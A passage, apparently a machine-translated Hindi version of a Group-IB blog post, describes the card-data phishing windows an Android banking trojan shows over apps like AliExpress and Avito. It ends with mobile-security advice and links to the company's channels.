  • कार्ड नंबर
  • कार्ड की समाप्ति तिथि
  • सीवीवी
  • कार्डधारक का नाम (सभी बैंकों के लिए नहीं)
  
  रनिंग एप्लिकेशन के आधार पर, अलग-अलग फ़िशिंग विंडो दिखाई जाएंगी। निम्नलिखित उनमें से कुछ के उदाहरण प्रदान करेगा:
  
  aliexpress:
  
  
  
  
  Avito:
  
  
  
  
  कुछ अन्य अनुप्रयोगों के लिए, उदाहरण के लिए Google Play Market, Aviasales, Pandao, Booking, Trivago:
  
  
  
  
  

  यह वास्तव में कैसा था?
  

  
  सौभाग्य से, जिस व्यक्ति को लेख की शुरुआत में वर्णित एसएमएस संदेश प्राप्त हुआ, वह साइबर स्पेस के क्षेत्र में एक विशेषज्ञ बन गया। इसलिए, वास्तविक, गैर-निर्देशक, संस्करण पहले बताए गए से अलग है: व्यक्ति को एक दिलचस्प एसएमएस मिला, जिसके बाद उसने ग्रुप-आईबी थ्रेट हंटिंग इंटेलिजेंस टीम को दिया। हमले का नतीजा यह लेख है। हैप्पी एंडिंग, है ना? हालांकि, सभी कहानियां इतनी अच्छी तरह से समाप्त नहीं होती हैं, और इसलिए कि आपका निर्देशन पैसे के नुकसान के साथ निर्देशकीय संस्करण की तरह नहीं दिखता है, ज्यादातर मामलों में यह निम्नलिखित, लंबे समय से वर्णित नियमों का पालन करने के लिए पर्याप्त है:
  
  • Google Play के अलावा किसी भी स्रोत से Android OS वाले मोबाइल डिवाइस के लिए एप्लिकेशन इंस्टॉल न करें
  • एप्लिकेशन इंस्टॉल करते समय, एप्लिकेशन द्वारा अनुरोध किए गए अधिकारों पर विशेष ध्यान दें
  • फ़ाइल एक्सटेंशन पर ध्यान दें
  • नियमित रूप से Android OS अपडेट इंस्टॉल करें
  • संदिग्ध संसाधनों का दौरा न करें और वहां से फाइलें डाउनलोड न करें
  • एसएमएस संदेशों में प्राप्त लिंक का पालन न करें।
  
  
  ग्रुप-आईबी साइबर क्राइम के बारे में सब कुछ जानता है, लेकिन सबसे दिलचस्प बातें बताता है।
  
  सूचना सुरक्षा, हैकर्स और साइबर हमलों, हैकविवि और इंटरनेट समुद्री डाकू के बारे में एक्शन-पैक टेलीग्राम चैनल (https://t.me/Group_IB)। कदम से सनसनीखेज साइबर अपराध की जांच, समूह-आईबी प्रौद्योगिकियों का उपयोग करके व्यावहारिक मामले और निश्चित रूप से, इंटरनेट पर शिकार बनने से बचने के तरीके के बारे में सिफारिशें।
  
  YouTube चैनल यहाँ
  इंस्टाग्राम www.instagram.com/group_ib पर ग्रुप-आईबी फोटोग्राफ
  Twitter लघु समाचार twitter.com/GroupIB
  
  ग्रुप-आईबी साइबर हमलों का पता लगाने और रोकने, धोखाधड़ी का पता लगाने और सिंगापुर में मुख्यालय वाले एक नेटवर्क में बौद्धिक संपदा की रक्षा करने के लिए समाधान के अग्रणी डेवलपर्स में से एक है।